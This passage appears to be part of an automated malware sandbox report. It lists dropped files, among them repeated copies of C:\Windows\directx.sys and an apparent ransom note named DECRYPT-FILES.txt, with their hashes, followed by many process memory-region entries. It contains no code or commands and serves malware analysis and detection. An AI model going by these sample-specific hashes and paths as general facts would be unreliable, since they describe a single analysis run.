                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    e90ba4a4a5defabd12e700ac069d338a00e643dc083926c1c0234e663402ee3c891d4d52524faaecba8149f66c6e6b99df05b77d5b9e00aa3e5ac14cc081a01b

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    263B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    418df6f8d90e5a5dcdcf5c152ee31e98

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    a7800b40f0752c3f00a3429cc7af95484bf56689

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    f4d5953412fda53e59bd9874544241d50d32aa72983ea3c9a4c1ac9ed3d6c095

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    580a1e7cb394263dd31b71dd42e9ae7932f8c920101ec0dc2d1fb2c372dcbf96fc93aa3178ebb7387cf1bcc4b89c279feb484572f17974fcdcd2e535a02cfaeb

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    322B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    07733913c0a878af9da807279aa4486f

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    60aee854349bdb8945a3dc3d52d283f41156ce8d

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    da5b3ef7f384f6a0dafc3b5d871a7b762718d75cdd97f02963e749d24080f430

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    0a51a8a2b6a299ce26dc203ebff76c871a386b80cca70889b22710c7aae094e549f641db5318f1326d3f818185d67ceaf18564988bb4da1540e39af726ff4d20

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    258B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    338e52c9e00aa4b8e6d2be18e8c01682

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    dcf0ebd0f021f0889553a24133e4e716de38771b

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    bfb71c34bd1f8c620103590c840ed274075b22e33155f2ecbf26e03f7c4b73f6

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    6be47412d229541a856f63a8ba0edaefa4d39132765246fd38d809a2860b676492c6fe1837f2e510d751a17e2c4ef08c126e6bd13b9c28a9fe96ebfa7be5f4ab

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    261B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    488efa1e1e4b71151cfb295721ee5ffd

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    fd3829a2e83e4a5bca50c771eca60766addeddbd

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    45a2fd49ce52383e7d96b6e22bf2b405653872c8cf96f00801142f086741883d

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    615755deb505fed659154a9f29490cdcb087411809dae0982a04321f3c790f89cfa8f0e6d6f7db9bc0358781778eafa5362fa0c00ddfaed0f95ce2742ae599f4

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    263B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    711a69ef999b96d67d98fd5187773add

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    bb662ef7afd7e607a9c83584c5e022f00225fb2a

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    c904a52e06274c93a8bc70c64ec490998150cfd687c6909586b1d10bc5a67f75

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    5f08f09be9d19171f0f9b993fafc636eaf1ed1a5bca0a76f74062cb7874175246dd5a1188a4436fd3d4c0b9a57bd1c8b06ddc001a302c397ce3984c8a8f6edb6

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    160B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    f3312b85a3f3a236ca67cdd38e0f9d35

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    7f5e061e962e78eea6302d5c10f085dff02130db

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    faf01a3c276109a53d2fc5cf94cd2ed0477d04cb48e1184d37c08546434af769

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    045e5a29b41ed6f05ae4feba6e1991c05aa1ee2bc33976d7496d4b0038f687e406208e3952c3bb745a67391044feaf1f8e969f9cda9c22cec4498e1870f3c2fc

                                                                                                                                                                                                                                                                                                  • C:\Windows\directx.sys
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    165B

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    311f4641538fadad698e4ed4b7acd7d9

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    71b91dedb6bbd5b774d5d06024e67217c6844aa2

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    58ba633e0b97eace155fe6cc03d6497562a4a074184e29b1132581a080faae20

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    2a591793ff35d1ebe19e69ad508125b2e11382a5cf8f13ada667b8036687576bfe6bccb7614d7d40b14b99302cccc63825bebd0a24ebffbb85d7904ad8473168

                                                                                                                                                                                                                                                                                                  • F:\$RECYCLE.BIN\DECRYPT-FILES.txt
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    10KB

                                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                                    fb91cbec4c1e60f8eaf0930d9634766c

                                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                                    f653e9fca6c8f84e9471b7a5d31b1f5f9679c80d

                                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                                    bb67eb72a7ad2e6557721451fb0b55967d2430e2848a152af9914e44edf5a5af

                                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                                    310968217afe9222121888d24f88e524d06ab70c6f9dc22ca10ea97a367ec7619a3ffb11a8559f4b75f86a7e05ed87b93bee6cac5e41f39f82ff01e1b6cdc533

                                                                                                                                                                                                                                                                                                  • memory/384-1872-0x000000006EE30000-0x000000006F3E1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    5.7MB

                                                                                                                                                                                                                                                                                                  • memory/384-1908-0x000000006EE30000-0x000000006F3E1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    5.7MB

                                                                                                                                                                                                                                                                                                  • memory/384-1901-0x00000000017B0000-0x00000000017C0000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                  • memory/396-67-0x0000000002350000-0x000000000241E000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    824KB

                                                                                                                                                                                                                                                                                                  • memory/396-1246-0x0000000000400000-0x00000000005DE000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    1.9MB

                                                                                                                                                                                                                                                                                                  • memory/396-2065-0x0000000000400000-0x00000000005DE000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    1.9MB

                                                                                                                                                                                                                                                                                                  • memory/396-180-0x0000000000400000-0x00000000005DE000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    1.9MB

                                                                                                                                                                                                                                                                                                  • memory/396-178-0x0000000000400000-0x00000000005DE000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    1.9MB

                                                                                                                                                                                                                                                                                                  • memory/396-176-0x0000000000400000-0x00000000005DE000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    1.9MB

                                                                                                                                                                                                                                                                                                  • memory/396-1884-0x0000000000400000-0x00000000005DE000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    1.9MB

                                                                                                                                                                                                                                                                                                  • memory/396-69-0x0000000000400000-0x00000000005DE000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    1.9MB

                                                                                                                                                                                                                                                                                                  • memory/396-68-0x0000000000400000-0x00000000005DE000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    1.9MB

                                                                                                                                                                                                                                                                                                  • memory/760-562-0x0000000000400000-0x000000000041B000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    108KB

                                                                                                                                                                                                                                                                                                  • memory/776-1425-0x00007FFBDBF30000-0x00007FFBDBF40000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                  • memory/776-1560-0x00007FFC1BEA0000-0x00007FFC1C0A9000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                                                                                                                  • memory/776-1819-0x00007FFC1BEA0000-0x00007FFC1C0A9000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                                                                                                                  • memory/776-1454-0x00007FFBDBF30000-0x00007FFBDBF40000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                  • memory/776-1443-0x00007FFC1BEA0000-0x00007FFC1C0A9000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                                                                                                                  • memory/776-1812-0x00007FFBD9D10000-0x00007FFBD9D20000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                  • memory/776-1468-0x00007FFBDBF30000-0x00007FFBDBF40000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                  • memory/776-1565-0x00007FFBDBF30000-0x00007FFBDBF40000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                  • memory/776-1668-0x00007FFBDBF30000-0x00007FFBDBF40000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                  • memory/776-1828-0x00007FFC1A430000-0x00007FFC1A4ED000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    756KB

                                                                                                                                                                                                                                                                                                  • memory/776-1788-0x00007FFC1BEA0000-0x00007FFC1C0A9000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                                                                                                                  • memory/776-1815-0x00007FFC1BEA0000-0x00007FFC1C0A9000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                                                                                                                  • memory/776-1577-0x00007FFC1BEA0000-0x00007FFC1C0A9000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                                                                                                                  • memory/776-1637-0x00007FFC1BEA0000-0x00007FFC1C0A9000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                                                                                                                  • memory/884-1825-0x00007FFC1A430000-0x00007FFC1A4ED000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    756KB

                                                                                                                                                                                                                                                                                                  • memory/884-1829-0x00007FFC1BEA0000-0x00007FFC1C0A9000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                                                                                                                  • memory/1028-1397-0x0000000002150000-0x000000000215F000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    60KB

                                                                                                                                                                                                                                                                                                  • memory/1028-1357-0x0000000000400000-0x000000000043D000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    244KB

                                                                                                                                                                                                                                                                                                  • memory/1044-3065-0x0000000000400000-0x000000000041B000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    108KB

                                                                                                                                                                                                                                                                                                  • memory/1044-1827-0x0000000000400000-0x000000000042F000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    188KB

                                                                                                                                                                                                                                                                                                  • memory/1044-1338-0x0000000000400000-0x000000000042F000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    188KB

                                                                                                                                                                                                                                                                                                  • memory/1220-1424-0x0000000000400000-0x000000000041B000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    108KB

                                                                                                                                                                                                                                                                                                  • memory/1392-1822-0x0000000000BB0000-0x0000000000BBA000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    40KB

                                                                                                                                                                                                                                                                                                  • memory/1392-1561-0x00000000002E0000-0x0000000000374000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    592KB

                                                                                                                                                                                                                                                                                                  • memory/1392-1835-0x0000000000BD0000-0x0000000000BDC000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    48KB

                                                                                                                                                                                                                                                                                                  • memory/1392-1861-0x00007FFBFA0C0000-0x00007FFBFAB82000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                                                                                                                  • memory/1392-1832-0x0000000000BC0000-0x0000000000BCC000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    48KB

                                                                                                                                                                                                                                                                                                  • memory/1392-2074-0x00007FFBFA0C0000-0x00007FFBFAB82000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                                                                                                                  • memory/1392-1804-0x0000000000BA0000-0x0000000000BAC000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    48KB

                                                                                                                                                                                                                                                                                                  • memory/1392-1879-0x000000001B120000-0x000000001B130000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                  • memory/1676-168-0x00000000023A0000-0x00000000023A1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/1676-1362-0x0000000000400000-0x000000000068E000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    2.6MB

                                                                                                                                                                                                                                                                                                  • memory/2268-1826-0x00007FFC1BEA0000-0x00007FFC1C0A9000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                                                                                                                  • memory/2364-1289-0x0000000000400000-0x00000000004D8000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    864KB

                                                                                                                                                                                                                                                                                                  • memory/2364-102-0x0000000000400000-0x00000000004D8000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    864KB

                                                                                                                                                                                                                                                                                                  • memory/2892-1477-0x00000000007B0000-0x000000000080E000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    376KB

                                                                                                                                                                                                                                                                                                  • memory/2892-1756-0x00000000007B0000-0x000000000080E000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    376KB

                                                                                                                                                                                                                                                                                                  • memory/2892-1836-0x00000000007B0000-0x000000000080E000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    376KB

                                                                                                                                                                                                                                                                                                  • memory/2892-1963-0x00000000007B0000-0x000000000080E000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    376KB

                                                                                                                                                                                                                                                                                                  • memory/3144-1847-0x000000006EE30000-0x000000006F3E1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    5.7MB

                                                                                                                                                                                                                                                                                                  • memory/3144-1851-0x0000000001630000-0x0000000001640000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                  • memory/3144-2053-0x000000006EE30000-0x000000006F3E1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    5.7MB

                                                                                                                                                                                                                                                                                                  • memory/3288-162-0x000000006EE30000-0x000000006F3E1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    5.7MB

                                                                                                                                                                                                                                                                                                  • memory/3288-3053-0x000000006EE30000-0x000000006F3E1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    5.7MB

                                                                                                                                                                                                                                                                                                  • memory/3288-164-0x0000000001530000-0x0000000001540000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                  • memory/3288-2979-0x0000000001530000-0x0000000001540000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                  • memory/3288-167-0x000000006EE30000-0x000000006F3E1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    5.7MB

                                                                                                                                                                                                                                                                                                  • memory/3288-2874-0x000000006EE30000-0x000000006F3E1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    5.7MB

                                                                                                                                                                                                                                                                                                  • memory/3288-187-0x0000000001530000-0x0000000001540000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                  • memory/3288-414-0x0000000001530000-0x0000000001540000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                  • memory/3444-1821-0x0000000000400000-0x000000000041B000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    108KB

                                                                                                                                                                                                                                                                                                  • memory/3900-1892-0x0000000072A30000-0x00000000731E1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                                                                                                                  • memory/3900-81-0x0000000000900000-0x0000000000908000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                                                                                                  • memory/3900-2076-0x00000000054B0000-0x00000000054C0000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                  • memory/3900-98-0x00000000052B0000-0x000000000534C000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    624KB

                                                                                                                                                                                                                                                                                                  • memory/3900-106-0x00000000054B0000-0x00000000054C0000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                  • memory/3900-103-0x0000000072A30000-0x00000000731E1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                                                                                                                  • memory/4144-1290-0x0000000000400000-0x000000000041B000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    108KB

                                                                                                                                                                                                                                                                                                  • memory/4416-150-0x0000000000400000-0x00000000004CC000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    816KB

                                                                                                                                                                                                                                                                                                  • memory/4416-1317-0x0000000000400000-0x00000000004CC000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    816KB

                                                                                                                                                                                                                                                                                                  • memory/4488-1871-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    88KB

                                                                                                                                                                                                                                                                                                  • memory/4592-3054-0x00000000000F0000-0x000000000013C000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                                                                  • memory/4592-3064-0x00007FFBFA0C0000-0x00007FFBFAB82000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                                                                                                                  • memory/4792-1889-0x0000000000400000-0x0000000000433000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    204KB

                                                                                                                                                                                                                                                                                                  • memory/4792-78-0x00000000015C0000-0x00000000015F1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    196KB

                                                                                                                                                                                                                                                                                                  • memory/4792-94-0x0000000000400000-0x0000000000433000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    204KB

                                                                                                                                                                                                                                                                                                  • memory/4792-415-0x0000000000400000-0x0000000000433000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    204KB

                                                                                                                                                                                                                                                                                                  • memory/4928-1432-0x0000000002000000-0x000000000200F000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    60KB

                                                                                                                                                                                                                                                                                                  • memory/4928-1408-0x0000000000400000-0x000000000042E000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    184KB

                                                                                                                                                                                                                                                                                                  • memory/5044-1106-0x0000000000400000-0x000000000041B000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    108KB

                                                                                                                                                                                                                                                                                                  • memory/5044-2063-0x0000000000400000-0x000000000041B000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    108KB

                                                                                                                                                                                                                                                                                                  • memory/5072-97-0x0000000010000000-0x0000000010010000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                  • memory/5076-1469-0x0000000000400000-0x0000000000705000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    3.0MB

                                                                                                                                                                                                                                                                                                  • memory/5076-173-0x0000000002320000-0x0000000002321000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                                                                  • memory/5124-1817-0x0000000000400000-0x000000000041B000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    108KB

                                                                                                                                                                                                                                                                                                  • memory/5212-1866-0x0000000000400000-0x000000000041B000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    108KB

                                                                                                                                                                                                                                                                                                  • memory/5348-2091-0x000000006EE30000-0x000000006F3E1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    5.7MB

                                                                                                                                                                                                                                                                                                  • memory/5348-2232-0x0000000001230000-0x0000000001240000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                  • memory/5348-2402-0x000000006EE30000-0x000000006F3E1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    5.7MB

                                                                                                                                                                                                                                                                                                  • memory/5720-2791-0x00000000004E0000-0x0000000000532000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    328KB

                                                                                                                                                                                                                                                                                                  • memory/5720-2928-0x0000000072A30000-0x00000000731E1000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                                                                                                                  • memory/5872-2280-0x000000001B930000-0x000000001B940000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                                                                  • memory/5872-2493-0x00007FFBFA0C0000-0x00007FFBFAB82000-memory.dmp
                                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                                    10.8MB